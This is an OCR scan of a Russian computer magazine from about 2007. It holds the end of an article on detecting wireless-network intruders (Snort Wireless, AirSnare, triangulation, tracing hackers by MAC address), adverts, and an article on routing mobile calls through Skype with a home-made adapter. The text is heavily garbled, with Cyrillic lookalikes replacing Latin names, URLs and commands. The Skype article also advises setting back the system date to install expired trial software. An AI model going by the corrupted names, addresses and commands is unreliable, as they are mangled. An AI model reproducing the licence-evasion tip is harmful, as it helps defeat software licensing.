обычно базируются на данных, поступающих из разных 
удаленных друг от друга источников. При этом анализиру- 
ются данные об уровне приема абонента, а также инфор- 
мация из логов систем обнаружения вторжений (Ю5). 

На представленной схеме (смотри рисунок) перед нами мо- 
дельтривиальной постановки: точки У и I выступают в ро- 
ли АР-« мониторов» (сенсоров нападения), такилииначе 
передающих событие «произошло сканирование» на 
специальную систему. Конец коридора ограничен 
бетонными стенами, изолирующими сигнал от помех 
извне. Задавая границу в радиопокрытии точки (к 




Дистрибутив 
Васкігаск, программы 
Му5І_АХ Сгеаіюг, ВаН 
РЕВиіІбег, МКВТ, 
Зувііпих, а также все 
вспомогательные 
утилиты ты найдешь 
на 0Ѵ0. 

На дискеты также 
обязательно найдешь 
весь описанный в ста- 
тье софт и полезные 
доки по методам 
трилатерации. 




> Некоторые мето- 
дытриангуляции 
используются для 
слежки за абонентами 
сотовой связи. Чисто 
теоретически, ес- 
ли стандартными 
средствами можно 
определить расстоя- 
ние от базовой стан- 
ции до телефона, то 
по расстояниям от 
трех базовых станций 
можно получить 
точные координаты 
аппарата, а по рассто- 
янию отдвух БС — две 
точки, в одной из кото- 
рых будет находиться 
телефон. Воттакая 
математика... 
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> Метод триангуляции на пальцах 



примеру, 10 метрами), можно выработать 
действия по реагированию на подозритель- 
ные события. 

Нетрудно догадаться, что если будетзаподоз- 
рен последовательный ЗіитЫіпд отточек 
2 , у к х, то злоумышленник находится 
в вполне определенном квадрате 
пространства. Соответственно, создавая 
подобную архитектуру по флагам и опираясь на 
внимание и определенный набор ПО, можно 
даватьуказание службе безопасности выдви- 
гаться в соответствующие стороны. 

Остается вопрос: чем фиксироватьдействия 
сканера? Это реализуется следующими про- 
граммными решениями. 

ЗпогІѴѴігеІезз 
Адрес: зпогі-ѵѵігеіезз.огд 
Платформа: ІІпіх 

Эдакая «пожарная сигнализация», которая 
предупредит практически о любой попытке 
взлома. Главное, чтобы были грамотно настро- 
ены все правила или, иначе говоря, предвари- 



ГЛОССАРИЙ 

Запросы ассоциации — это набор 
запросов, посылаемых к точке доступа, от- 
вет на которые зависит не только от 
наличия в радиусе активныхточек, но и от 
режима, в котором находятся эти устройства. 
Запросы аутентификации — методы, приме- 
няемые для успешной авторизации в ѴѴі-РІ 
сетяхс использованием специальных 
фреймов. 

55Ш (ЗегѵісеБе* Ісіеп*Кіег]/Е55Ю (Ехіепсіесі 
Бегѵісе 5е* ЮепіКіег) — идентификатор, поз- 
воляющий отличать сети друготдруга, зада- 
ющий им определенное название. 
І_І_С-кадры используются в стандарте 
802.2, который является базовым для 
популярныхтехнологий сетей, проводных 
и беспроводных. НС — это подуровень 
канального уровня сетевой модели 051 (отве- 
чает за организацию канала связи). 





> Комплекс 05ѴѴА собственной персоной! Точки доступа, сотрудники, доверенное обору- 
дование и даже нарушители — все как на ладони 



тельно заданные шаблоны атак и вредоносных 
объектов. Зпогі ѴѴІгеІевв работает подобно 
популярному 5погІ, но в беспроводных сетях 
802.1 1 х, защищая их от нападения. Настройка 
сводится к следующим пунктам: 

• указание информации об охраняемой терри- 
тории (параметры сети, имяточки доступа); 

• конфигурация предпроцессоров; 

• конфигурация плагинов; 

• дополнительные собственные правила. 
Наиболее важный пункт здесь — конфигурация 
предпроцессоров, благодаря которым и про- 
исходит переход с намека на атаку к боевой 
тревоге. 

• Препроцессор АгѵМЗ^итЫег. Для обнару- 
жения точекдоступа МеЫиплЫег рассылает 
широковещательные нулевые 55Ю, которые за- 
ставляютдругиеточки доступа присылать свои 
55Ю нам. 5пог1 осознает массовость этого дела 
с одного МАС-адреса и объявляеттревогу. 
Помимо этого, в наборе ЗпоііѴѴігеІезз присутс- 
твуют предпроцессоры для детекта пассивного 
скана и попытки подмены МАО. 

• Предпроцессор Ап^іПоогі. При превышении 
определенного количества кадров в единицу 
времени или попытокавторизации происходит 
распознавание Оепіаі О^Зегѵісе Аіаск. 

• Предпроцессор Ап+А Мае гроаГіпд. Выяв- 
ление несоответствий и сравнение с базой 
данных доверенных клиентов. 

После редактирования всех параметров файл 
зпогСсоп! обновится, и ты сможешь запустить 
демон в фоновый режим: 

зпогД -Б -А биіі 

Мззуздіазз 

Адрес: Ноте.сотса5І.пеі/~)аѵ.(ІеЬоег/ 

П55РѴдІЭ55 

Платформа: ѴѴіпсІоѵѵз 

N еЫи т Ые г 5 руд Іазз и с п ол ьзует тот же 
принцип, что и предпроцессор Зпогі 
ѴѴІгеІевв. К сожалению, из-за малого спектра 
поддерживаемого оборудования его не так 
часто применяют. Рассмотрим его настройку 
на примере роутера І_іпк5уз. Перед работой 
необходимо позаботиться о наличии драйвера 



ѴѴІпРсар ( ѵѵіпрсар.роіііо.іі ). Далее вся настрой- 
ка осуществляется через довольно странный 
конфигурационный файл МЗЗрудІазз.іпі, состо- 
ящий из следующих 1 2 строк: 

0402 011110ВВ Ассезз РоіпВ МАС 
АсИгезз (N 0 соіопз апсі N 0 зрасез) 

С : \ѵ7ІпсІсжз\са1с . ехе 
О 
5 

С : \ѵ\/іпс!оѵ\/з\поЦерас1. ехе 

0 

1 
1 

0 

1 

0 

1 

Втаком непонятном конфиге сам черт ногу 
сломит, поэтому я объясню все 
по порядку. В первой строке требуется 
прописать МАС-адресточки доступа. Вторая 
строка указывает путь к приложению, ко- 
торое будетзапущено в моментопознания 
злоумышленника. Третья принимаетзначения 
О или 1 , в зависимости оттвоего желания запус- 
кать указанное приложение или нет. 

Четвертая строка — таймаутв секундах до запус- 
ка следующего приложения после обнаружения 
вардрайвера. Пятая и шестая строки анало- 
гичны второй и третьей, но как раз следующего 
приложения. Седьмая определяетзапись 
истории событий в лог Ы55рудІаз5І_од.М. 
Остальное неважно — скопируй как есть. 

Аігзпаге 

Адрес: Ноте.сотсазІ.пеІ/Наѵ.гіеЬоег/ 
аігзпаге 

Платфорома: ѴѴіпбоѵѵз 

Если в сети работают одни и те же устройс- 
тва (например, ноутбуки сотрудников), то 
можно легко внести их МАС-адреса 
в «белый список» и отслеживать появ- 
ление посторонних устройств, которые 
в этот список не входят. На таком простом 
принципе, в частности, базируется 
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Кеасіу, Зіеасіу, Ѵізіа™ 

Стильные и надёжные материнские платы 
Рохсопп применяются в миллионах персо- 
нальных компьютеров по всему миру. Исполь- 
зуя современные компоненты совместно с 
материнскими платами Ѵізіа™ Неасіу от 
Рохсопп, вы создадите решение, поддержи- 
вающее новейшую операционную систему от 

МІСГОЗОІІ. 



ОеВІТ 

ГАННОВЕР, ГЕРМАНИЯ 
15-21 МАРТА 2007 

Ждём Вас на 
стенде В 2а, холл 21 




Р9657АА-8ЕКК32Н 



С9657МА-8ЕКГС52Н 




• іпіеі* Р 965 

Оризі ООЯ2 800. 4- РММз. 80Ь Мая 
#7.1 сііапгайі НО Аийіо, СідаЬіГ І_АМ 
о Г РСІеяІб 

#6* ЗА ТАИ, Г еЗАТАІІ, КАЮ 
о 2* ЕЕЕЕІШа 




• ІпІеІ* 6965 

о ОиаЗ ООЙ2 600. 4' ОИММв. 80Ь Мах. 
о 7.1 сйаппеі НО Аийіо, ОщШ І-АІЧ 
О Графина Іп№ * ОМА ХЗООО с 
Оеаг Ѵіііео Тесйлоіоду 
о 4" ЗАТАИ, Г аЗАТАІІ. КАЮ 
0 2' ІЕЕЕ1394Э 




Зиррсгіі 

ІпіеІ 

Сеге 2 



О 

V®' 





ЗырроМ* 

Іпіеі 

Соге 2 

Ехігогпе 

рХВД№С*й1Г 



т 

ѴУтскіюз 

ѴіТГ=:' 




РОХСОПП 

ѵ/ѵлѵ.Тохсопп. ги 



Дилеры: Москва: РкгіСоШ - (495)730-5603; 51 пгШзяіег - {495)703-4242: УІІга ЕІесЕгопісз - (495)790-7536; Арбпит компьютера - 1495)725-6003; АРКѴГС* 
(495)900-5407: Белый ватер ЦИФРОВОЙ - (494)730-3030; Ии л айн ■ (495)941 *616 1 ; КИБЕРТРОН И КА - (495)504-2531 ; Лайт Ком муникейшн ■ 1495)956- 
4951; НЕОТОРГ - сеть компьютерных магазинов - (496)223-2323; Сптеоли Лайорптрмн - (495)500-9305; Форум-Центр - <495)775-775-9; Альметьевск: 
Компьютерный мир ■ <8553)256-934; Барнаул: К- Трои д - (3852)66-6910; Воронов: Рет - (4732)77-9339; Екатеринбург: брасс ■ <343)371-6568; Трилайи 
- (343)373-7070; Ижевск; Корпорация Центр - <3412)433-605; Курск: ФИТ ИСК 2000) - {471 2] 5 12-50 1 ; Новое нбнфск: НЭТА - <3332)304-1010; Пермь: 
ИнстзрТехнолоджй - <342)212-4646; Пятигорск; Дней ком - {6793] 33-0 10 1 ; Роетов-кэ-Дону: Форте ■ {663)267-6810; Самара: Аксус - (646)270-5960, 
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> Мониторинг долбящихся в сеть студентов налицо 



> Конфигурация 5пог* ѴѴігеІезз 



программа Аігзпаге. Все, что тебе пона- 
добится для работы, — это библиотека 
ѴѴІпРсар [ ѵѵіпрсар.роіііо.іі і и свободный 
компьютер, подсоединенный к беспровод- 
ной точке доступа. В настройках програм- 
мы не забудь выбрать требуемый адаптер 
и внести в БгіепсІІу Мае Іізі все доверен- 
ные устройства, подключенные к твоей 
сети, включая Мас'и ХЬох'ы, сетевые принт- 
серверы, лэптопы, ІРосГы с поднятым ѴѴі-РІ 
и тому подобные излишки моды. 

Нажимаем «Біагі», и экран меняет цвет на 
красный, что говорит о том, что твоя тачка 
перешла в боевой режим, режим поиска 
прыщавых хакеров. 

□Активные методы 

Во всех этих примерах та к или иначе были 
задействованы статические системы обнару- 
жения атак в беспроводной среде. Но навер- 
няка есть и более сложные и эффективные 
техники обнаружения злоумышленника! Хо- 
чу обратить твое внимание на систему 
ВізігіЬиіесІ ѴѴІгеІезз Зесигііу Аибііог 
( гезеагсЬ.ІЬт.сот/дзаІ/сІѵѵза/ ). которая при- 
нципиально отличается от остальных. Воз- 
можности БѴѴЭА позволяют определять 
физическое положение злоумышленника 
и даже отображать его на интерактивной 
карте, то есть осуществлять самую на- 
стоящую привязку к местности. Это ста- 
новится вполне реальным за счет пос- 
тоянного распределенного мониторинга 
сети. Осуществляется это следующим 
образом: определенному количеству 
сотрудников компании, предположим, служ- 
бе безопасности, выдаются портативные 
компьютеры со специальным программным 
оснащением. Параллельно с этим устанав- 
ливается Ьаск-епсІ сервер безопасности, ко- 
торый будет считывать целевую информацию 
с устройств сотрудников и заодно определять 
их местоположение относительно точек 
доступа на основе сведений о сигнале и их 
радио покрытии. Обработку этих данных цент- 
рализованно выполняет специальный сервер. 



Он анализирует состояние радиоэфи- 
ра различных источников и с помощью 
законов геометрии и дискретной матема- 
тики определяет примерное расположения 
объекта. Понятно, что чем бол ьше элементов 
будет участвовать в работе распределенной 
системы мониторинга, чем выше будетточ- 
ность определения на данной 
территории. 

Какойже принцип лежитв основеопре- 
деления координат объекта? Банальная 
триангуляция, которая также применяется 
в глобальной системе позиционирования 
ѲР5. 

В качестветех самых портативных девай- 
сов было принято задействовать разработ- 
ку ІВМ, именуемую ѴѴІгеІезз Зесигііу Аисіііо г 
(ѴѴ5А). Девайс представляет собой самый 
обычный і РАО РБА со специальным дистри- 
бутивом І_іпих. Девайс представляет собой 
самый обычный і РАО РйА со специальным 
дистрибутивом І_іпих и набором предус- 
тановленныхтулз для пен-тестов и аудита 
беспроводных сетей: ѵѵіапбитр, 
еібегеаі, Зпіііег и т.п. Используя их, 
сотрудники, по сути, проводятактивный 
аудит, отчитываясь главному серверу. 

□ Ох уж этот МАС-адрес 

Даже просто обнаружив чужого сети, о нем 
можно кое-что узнать. Тотже МАС- 
адрес, который является уникальным 
признаком любого оборудования, выдаст 
некоторую информацию. Ведь очень просто 
установить связь между ним и производи- 
телем девайса. Дело в том, что по первым 
октетам МАС'а и базе О III ( зіапсіагсіз.іеее. 
огд/гедаиіб/оиі/оиі.іхі ) можно сделать 
соотношение, определив производителя. 

Вспомни, на это, в частности, опирается 
ЫеівіитЫег при нахождении точки, вы- 
свечивая в графе ѴЕЫООР используемое 
оборудование, например СІ5С0. 
Специализированные структуры ведут учет 
подобных сведений с привязкой к про- 
даваемым устройствам. Обратившись 
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к компании-производителю, компетентные 
структуры в первую очередь выявят, по каким 
точкам оно было распределено и каким лицам 
продано. Кредиты и пластиковые карты еще 
никто не отменял, поэтому при определенном 
везении и наличии возможностей (которая 
естьу органов) можно найти хакера, даже 
зная, казалось бы, какой-то МАС-адрес. 

Ну что, ты засомневался в своей полной 
анонимности? Ш-И 



КТО СЛЕДУЮЩИЙ? 

• Посетитель кофейни арестован за злоупот- 
ребление хотспотом. Персонал кофейни 
ВгеѵѵесІ Аѵѵакепіпдз в Ванкувере совместно 
с полицией задержал двадцатилетнего Эри- 
ка Смита, который юзал сетку забегаловки 
на протяжении трех месяцев. 

• Сем надцатилетнему жителю Сингапу- 
ра Г эрил Тан Цзя Люэ грозит до трех лет 
тюрьмы за несанкционированный доступ 
к точке доступа своего соседа. Бенжамин 
СмитТретий, жительФлориды, впервыеза 
всю историю штата был осужден за взлом 
публичной беспроводной сети. 

• В штате Иллинойс арестована целая ко- 
манда вардрайверов, подробно это событие 
освещалось на іагк.сот и іогит.сіеісоп.огд. 

• В мае 2005 года, после нескольких атак 
на правительственные сети США, конт- 
рольно-счетная палата США составила 
доклад, в котором фигурировали сле- 
дующие статистические данные: из 24 
крупнейших правительственных агентств 9 
не имеют планов по обеспечению защиты 
ѴѴі-Рі сетей; в 13 агентствах не установле- 
на защита; около 90 ноутбуков одного из 
выбранныхагентств были настроены на 
автоматический поисксигнала, что являет- 
ся основополагающим при проведении атак 
ЕѵіІТѵѵіп/Водие АР; а большинство агентств 
не отслеживает происходящее в своих 
беспроводных сетях. 
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/ ТОМ СЬАМСГЗ КАІЫВОѴѴ ЗШ ѴЕОАЗ 



При попытке захвата международного 
террориста Ирэны Моралес, к команде 
«Радуга» попадают сведения о плане атаки 
на Лас-Вегас и о существовании нового 
оружия массового поражения. Жизнь 
миллионов людей в опасности. 

Судьба Города Г рехов в твоих руках... 
Примешь ли ты этот вызов?! 



ДЛЯ ТОГО ЧТОБЫ ПОЛУЧИТЬ ЭТУ ИГРУ 

ОТПРАВЬ 5М5 СО СЛОВОМ ѴЕСА5 НА НОМЕР 7 [320 



Моіогоіа: С380, С385, , С650, , Е1000, Е398, Е550, КА2К ѴЗ, КА2К ѴЗх , Ѵ300, Ѵ400, Ѵ500, Ѵ505, Ѵ525, Ѵ545, Ѵ547, Ѵ550, Ѵ551, Ѵ600, Ѵ620, Ѵ635, Ѵ80. 

№кіа: 2650, 3100, 3120, 3200, 3220, 3230, 3300, 35101, 3520, 3530, 3595, 3600, 3620, 3650, 3660, 5100, 5140, 6010, 6020, 6100, 6200, 6220, 6230, 62301, 6260, 6600, 6610, 6610І, 
6620, 6630, 6670, 6680, 6681, 6800, 6820, 7200, 7210, 7250, 72501, 7260, 7610, 7650, И-Саде, КІ-Саде СЮ. 

Задет: туѴ-55, туѴ-65, туѴ-75, туХ-7, туХ5-2. 

Затзипд: ЗСНЮ500, ЗСН-ЕЗЮ, ЗСН-ЕЗЗО, 8СН-Е630, ЗСН-Е700, 5СН-Е760, ЗСН-Е800, ЗСН-Е810, ЗСН-Е820, ЗСН-Х460. 

Зіетепз: С65, СѴ65, СХ65, СХ70, СХ75, СХТ65, СХѴ65, М65, 565, 5К65, 3165. 

Зопу Егісззоп: й750і, Р500І, ЗЗООі, КЗООі, К500, К500І, К508, К508І, К600І, К700, К700І, К7501, 5700І, Т610, Т616, Т630, Т637, Ѵ600, Ѵ800, ѴѴ550, ѴѴ8001, 21010, 2500, 2520, 
2600, 2800 



Стоимость отправки зтз-сообщения для абонентов МТС - 135.59руб, Билайн - 143.5руб, Мегафон - 145руб. 
Все цены указаны без НДС. 









СТЕПАН «ЗТЕР» ИЛЬИН 



Еіеио 



СОТОВЫЙ НА ХАЛЯВУ, 

ИЛИ НОВЫЕ ВОЗМОЖНОСТИ 
5КУРЕ 



КАК ГРАМОТНО ЭКОНОМИТЬ НА СОТОВОЙ СВЯЗИ 



До неприличия дешевые звонки с помощью компьютера — ты думаешь, это все, 
на что способен Зкуре? Ничего подобного ! Если немного поэкспериментировать, 
то можно вообще устроить себе рай на Земле. Вместо компьютера и гарнитуры ис- 
пользовать обычный телефон или вообще звонить со своего мобильного по всему миру 
по тарифам Зкуре. Ты уже в предвкушении? 



о, что с помощью Зкуре можно 
общаться голосом по всему 
миру, знает каждый. Абсолютно 
неважно, где будут находиться 
собеседники — в одной комнате или в разных 
уголкахземного шара. Платуза разговоры меж- 
ду абонентами Зкуре никто не возьмет. Все, что 
для этого требуется, — это стабильный инет 
и наушники с микрофоном. Многие из 8 мил- 
лионов активных пользователей не ограничи- 



ваются одними только звонками между собой 
и зачастую обращаются к платным возможнос- 
тям системы, используя Зкуре для звонков на 
городские и мобильныетелефоны. Грошовые 
цены, установленные сервисом, всячески 
стимулируют подобную активность. Увидев, что 
звонки в Штаты стоят всего пару центов, не- 
вольно задумываешься: «А кому бы можно было 
там позвонить, чтобы попробовать?..» Впрочем, 
обо всем этом мы писали в статье «Телефонные 



шалости» («Хакер», #8/2006), поэтому сейчас 
лучше посмотрим, как возможности Зкуре 
использовать по полной программе. 

□ Подключаем обычный телефон к Зкуре 

Постоянно разговаривать через гарнитуру, мяг- 
ко говоря, неудобно. Надев огромныеуши, 
ощущаешьсебя космонавтом или, на худой 
конец, телефонисткой из саіі-центра, привя- 
занной к своему компьютеру. Хорошо, когда 
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> Бкуре ругается, что его пытается использовать сто- 
роннее приложение 

есть деньги на специальный Бкуре-телефон (обзор был у нас 
в январском номере), но когда их нет? И если собрать вруч- 
ную сам телефон нельзя, то можно попробовать сварганить 
аналогдругого девайса. А именно СЬаі: СогсГа — известного 
в кругах Бкуре-фанатов устройства, с помощью которого 
к компьютеру подключается обычный телефон. Эта неболь- 
шая коробочка, величиной с АОББ-сплиттер, имеет всего 
3 провода: один телефонный, который присоединяется 
к привычномутелефонномуаппарату, и два обычных мини- 
джека, которые вставляются в гнезда динамика и микрофона 
звуковой карты. Принцип всей этой конструкции до неприли- 
чия прост: имеющиесяу каждой трубки динамики микрофон 
выполняютсвою обычную функцию (захватывают и воспро- 
изводят голос), а кнопки телефонного аппарата используются 
дляуправленияБкуре’ом. Спрашиваешь, какс ихпомощью 
можно чем-то управлять? Очень просто. Каждая кнопка 
телефона (1 -9,*,#) передается с помощьюзвуков разной 
частоты, которые легко распознать и использовать какуправ- 
ляющие сигналы. Вспомни справочную службу сотового опе- 
ратора или автоответчик кинотеатра, где с помощью телефона 
ты выбираешь нужную тебе информацию. Тут используется 
тотже механизм. Жальтолько, что, несмотря на примитивную 
конструкцию, оригинальный девайс вместе с программой 
стоитпочти $30, но мы соберем егоаналогза 100 рублей! 
Первую рабочую схему и мануал по ручной сборке такого 
девайса предложили на сайте ѵѵѵѵѵѵ.дгѵпх.сот/іпсІех.рЬр/ 
ргофсІз/ЬиіІб-ѵоиг-оѵѵп-сЬаІ-согсІ/1 . Описанный способ хоть 
и был работоспособным, но сильно усложнялся использова- 
нием дорогого и громоздкоготрансформатора. Поэтому чуть 
позже Ѵііаіі Ѵігиіаіпе предложил на своем сайте ( ЬирУ/ѵіІаІ. 
ргі.ее/РБТКІ/гиз.НітІ- ) модификацию этой схемы (смотри 
рисунок). Она настолько простая, что ее даже необяза- 
тельно паять — можно собрать все навесным монтажом, то 
есть соединить все элементы между собой, не припаивая 
к печатной плате (которую еще нужно было бы развести 
и изготовить). Фотография такого монтажа внесет оконча- 
тельную ясность в порядок соединения между собой двух 
мини-джеков, телефонного Р~І-1 1 -разъема, нескольких 
конденсаторов/резисторов и батарейки на 9 В. Можешь 
смело нести схемку в магазин и вручать продавцу — пусть 
тот подбираеттебе все необходимое. Единственное, на что 
я хочу обратить внимание, — это регулируемый резистор. 

В принципе, без него можно обойтись, просто автор 
схемы регулировал так громкость микрофона. По его же 
словам, его можнозаменить обычным резистором на470 Ом. 
Когда аппарат будетсобран, подключай его к своему 
обычномутелефону (лучше всего беспроводному) и гнез- 
дам Міс три! и БреакегоіЛ на материнской плате или 
аудиокарте. После этого приступай к установке программной 




> Скайп — великое изобретение! 

части, а именно программы СНаІ-СогсІЙВІаІегБК. Период ее 
действия давно истек, поэтому пойдем на хитрость и перед 
инсталляцией установим системную дату на 2005 год. Нуж- 
на и минимальная настройка, но процессом руководит 
автоматический мастер аиІоШпіпд, такчто проблемы 
исключены. Теперь можешь поднимать трубку и делать 
следующее: 

*1 — ответить на звонок в Бкуре; 

*# — для отказа от ответа; 

*[номертелефона]# — вызов абонента по его международ- 
ному номеру. 

По-моему, очень здорово, когда можно воттак просто ходить 
по дому с трубкой радиотелефона и разговаривать с людьми 
из США и Европы по смехотворным тарифам Бкуре. Кстати 
говоря, приведенный механизм не обязываеттебя исполь- 
зовать именно Бкуре. Можно вообще поднятьу себя в сетке 
ѴоІР-сервер (на базе АзіегіхйНоте, например) и общаться 
друге другом через ІР, используя при этом самый обычный 
аналоговый телефон. 

□ Как заставить сотовый 
работать по тарифам Бкуре 

Внимание! 0,01 7 евроцента зазвонокв Москву 
и Питер, столько же — в США и любую европейскую 
страну. Бесплатные звонки внутри сети Бкуре. Заманчивое 
предложение, правда? А теперь представь, чтотакиетари- 
фы появятся прямо натвоем сотовом телефоне. 



г \ 
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>На дискеты най- 
дешьБкуре под раз- 
ные платформы, про- 
граммы Согб@ 
ОіаІегБКи Ерух 
МоЬІІе, а также 
весь остальной 
софт, упоминаемый 
в статье. Бонусом 
идет материал «Теле- 
фонные шалости» из 
августовского номера 
с описанием общих 
возможностей Бкуре 
— рекомендую 
ознакомиться. 




> ѵѵѵѵѵѵ.5кѵре.сопп/ 
ргосіисіз/ехріаіпесі. 
Мші— подробное 
объяснениетого, как 
работает Бкуре. 
ѵѵѵѵѵѵ.едо.сот 

— официальный сайт 
программы ЕСЮ. 
ѵѵѵѵѵѵ.зкѵресІиЬ.ги 

— крупнейший сайт 
по Бкуре в России. 




> Клиента для Бкуре 
всего можно взять 
с собой, записав на 
флешку его рогіаЫе- 
версию. 

Ееты можешь найти 
на сайте 
ѵѵѵѵѵѵ. гоЫоасЬ. 
пеі/ргоіесів/ 
рогІаЫеаррІісабопз 
или на нашем диске. 
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Позвонить 

Начать Чат... 

Отправить 5М5... 

Отправить Контакты... 
й Отправить Файл... 

Щ Послать Сообщение На Автоответчик 
Пригласить на Конференцию 

Щ Доп. Возможности ► 

ѵ Посмотреть Личное Инфо 
Переименовать... 



Настройка быстрого Набора. . , 



Удалить Из Списка Контактов 
Блокировать Этого Пользователя 
Запросить Контактные Данные 

2 Посмотреть Историю Сообщений 

> Назначаем номера для быстрого вызова 




> Перед использованием ЕрухтоЬіІе нужно настроить Ѵоісе 
Оаіеѵѵау 

телефон настроить на автоматический прием 
входящего звонка (такая функция доступна 
при подключенной гарнитуре). В итоге, для 
звонка через Зкуре тебе нужно лишь позвонить 
на номер шлюза и далее вызватьабонента 
с помощью команд, описанных в предыдущем 
разделе. Стоимость звонка за рубеж в этом слу- 
чае складывается изтарифа на сотовую связь 
внутри сети (обычно 1 -3 цента) и тарифа Зкуре 
в нужном направлении (обычно не более двух 
евроцентов). 



Гдебыты не находился —дома, научебе или на 
работе, ты всегда сможешь позвонить другу за 
границу и болтать с ним хоть 3 часа. О, вижу, те- 
бя это заинтересовало. 

Общая идея остается той же самой — мы по- 
прежнему будем управлять программой Зкуре 
с помощьютональныхсигналов, которые 
будет распознавать программа 
СНа1:-СогсІ(сЮіаІег5К. Но как передать ей 
эти тональные сигналы, оставаясь при этом 
полностью мобильным? Лучше всего восполь- 
зоваться дополнительным сотовымтелефоном 
с Ьапсіз-ітее, который будет выполнять обя- 
занности шлюза. Подойдетсовершенно любой 
телефон, пускай даже десятилетней давности 
и частично неисправный (тотже дисплей нам 
нафигне сдался). Расположенный дома рядом 
с компьютером, он будет приниматьзвонки 
с твоей основной мобилы (которую ты всегда 
носишьс собой) и передавать данные (голос 



и тональные сигналы) компьютеру, то есть 
Зкуре’у. Не надо говорить, что звонки внутри 
одной сотовой сети, по обыкновению, самые 
дешевые, а с учетом всевозможных бонусов 
(любимый номер, звонки внутри группы или 
одного тарифа и т.д. и т.п.) можно вообще свести 
стоимость минуты соединения до 1 -3 центов. 

В итоге, получаем туже самую схему, что 
и в предыдущем разделе, но на любом 
расстоянии от компьютера. Правда, остается 
один вопрос: как подключить этот допол- 
нительный сотовый телефон к звуковой 
карте? Да, знаешь, не особоухищряясь. 

Берем обычную гарнитуру, то есть наушни- 
ки и микрофон, и подключаем к звуковой 
карте. А далее с помощью скотча/изоленты 
или пластиковых стяжек просто соединяем 
микрофон гарнитуры с динамиком Ьапбв- 
Ітее. И наоборот. Полученную конструкцию 
нужно тщательно шумоизолировать, а 



□ Цивилизованный метод 

Описанный подход полностью работоспо- 
собен, но эстетическим его не назовешь. 

К тому же к старомутелефону, который 
найти, в общем-то, не проблема, придется 
отыскатьещеи гарнитуру. И это можетока- 
заться гораздо более сложной задачей. Скажу 
тебе по секрету: есть и другой способ, бо- 
леедорогой (как правило), но и более 
технологичный. Для реализации также пот- 
ребуется дополнительный инвентарь, а имен- 
нотелефон с ВІиеІооіЬ и ВТ-модульдля 
компьютера. В этом случае все голосо- 
вые данные будут передавать с телефона 
по ВТ через так называемый Ѵоісе Оаіеѵѵау 
(аудиошлюз), а управлением Зкуре’ом будет 
заниматься программа Ерух МоЬІІе 
(ѵѵѵѵѵѵ.ерухтоЫ[е.сот/іпсІех.рЬр?раде=Ьоте). К со 
жалению, этот вид связи поддерживает не каж- 



ТАРИФНЫЕ СЕНСАЦИИ 



18 января 2007 года компания 5куре огласила новейшие расценки на услугу ЗкуреОш. Приятная новость заключается в том, 
что на многих направлениях цена на звонок снижена до 1,7 евроцента в минуту. А это Чешская республика, Гуам, Венгрия, Израиль, 
Люксембург, Малайзия, Пуэрто-Рико, Аляска и Гавайи. В тоже время сильно огорчает другой факт — введенная, подобно нашим 
операторами сотовой связи, плата за соединения (3,9 евроцента). Впрочем, если ЗкуреОтты используешь редко, то это не долж- 
но тебя огорчать. А если же являешь активным абонентом, то специально для тебя появился специальный тариф — Зкуре Рго. Он 
включает в себя безлимитные звонки по всем направлениям, стоимость которых ниже 3,9 евроцента в минуту. Стоит он всего 2 евро 
в месяц. Только вот пока непонятно, войдет ли Россия в число бесплатных направлений или нет. 
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> Схема самодельного СЬаІ-согсГа 

дый донгл (ВТ-модуль), поэтому Ерух 
МоЬіІе требует обязательной установки 
драйверов ѴѴЮСОММ ВІиеіооіЬ ЭоЙѵѵаге 
115В. Их ты можно закачать с сайта 
ШрУ/пеѵѵ-егісззоп.пагосІ.ги/воЙ рс.Ыт или 
взятье нашего диска. Соответственно, ес- 
ли в твоей системеуже были установлены 
драйверы, их необходимо удалить и установить 
вместо нихѴѴЮСОММ’ские. Нетгарантий, что 
твой ВТ-модуль с ними заработает. Но ве- 
роятность велика. В случае возникновения 
проблем, их всегда можно удалить. Если же все 
прошлоуспешно, приступаем к настройке. 

Для начала нужно уста но вить связь между теле- 
фоном и компьютером, или, точнее говоря, на- 
ладить аудиошлюз. ВІиеіооіЬ 5еЩр ѴѴігагсІ , вы- 
зываемый через иконку в трее, будет нам в этом 
помогать. Первое, что нужно сделать, — это вы- 
брать пункт«І ѵѵапПо Епб а зресіііс ВІиеіооіН 
беѵісе апб сопбдиге ИоѵѵіЫз сотриіегѵѵіЦ иве 
ІІ5 зегѵісез». Далее убедись, что на телефоне 
включено обнаружение, и жми «ЫехР>. Мас- 
тер просканируетэфир и выдастсписок всех 
найденных устройств, среди которых нужно 
обязательно найти свой телефон и снова нажать 
«Ыехі». На следующем шаге можешь выбрать 
нужный сервис — Ѵоісе баіеѵѵау. Все — соеди- 
нение с компьютером установлено, поэтому 



телефон лучше всего положить в надежное 
место, подключить к зарядке и больше без 
необходимости не трогать. 

Теперь дело за Ерух МоЬіІе, который, для 
начала, нужно установить. Если во время 
установки мастер ругнется, что на компьютере 
не был найден ѴѴЮСОММ’ский стек, можно 
смело обрывать процесс. Это значит, что ты до 
сих пор не установил нужный драйвер для 
своего донгла. Сразу после запуска программы 
должно появиться окошко Экуре’а, которое 
предупредиттебя, что клиента хочет использо- 
вать другое приложение (Ерух МоЬіІе). В этом 
нет ничего удивительного, поэтому можно смело 
разрешить подобную активность (выбираем 
«АНоѵѵіЫв ргодгат Іо изеЭкуре»). В треетут 
же появится значок Ерух МоЬІІе’а, а мастер 
предложиттебе провести первичную настройку 
программы. Что в нее включается? 

Во-первых, сканирование эфира и выбор 
телефона-шлюза. Во-вторых, задание номеров 
с телефона, для которых будет осуществлять- 
ся управлениеЭкуре’ом. Нужно, по меньше 
мере, указать номер своей основной мобилы или 
разрешитьуправление абсолютно для всех. 
Помимо этого, предлагается задать файл, кото- 
рый будет проигрываться в линию для входяще- 
го звонка. Из основного, пожалуй, все. 



тается только проверить систему и куда-ни- 
будь позвонить. Как это сделать? Да проще 
простого. Дело в том, что для каждого контакта 
в записной книжке 5 куре может быть задан но- 
мер для быстрого вызова (ЭреесІ Оіаі). Это число 
из промежутка 1 -99, которое можно быстро 
набрать на клавиатуре и тутже вызвать нужного 
абонента. Или же... передать его с помощью 
тонального набора междудвумя сотовыми 
телефонами! Достаточно со своего обычного 
мобильника набрать номер шлюза, дождать- 
ся его ответа (прозвучиттональный гудок 
или мелодия, которую ты назначил), после 
чего набрать на телефоне номер быстрого 
набора: *номер быстрого вызова#. Соединение 
установлено! 

Чтобы каждый раз не заниматься этим вручную, 
можно записать номер шлюза и номер быс- 
трого вызова в записную сотового книжку 
телефона. Запись будет выгладить следующим 
образом: [номер тел ефона-шл юза] р*[номер 
быстрого вызова]#. Единственный непонятный 
символ «р» вводится на клавиатуре при долгом 
нажатии на звездочку («*»). Таким образом, что- 
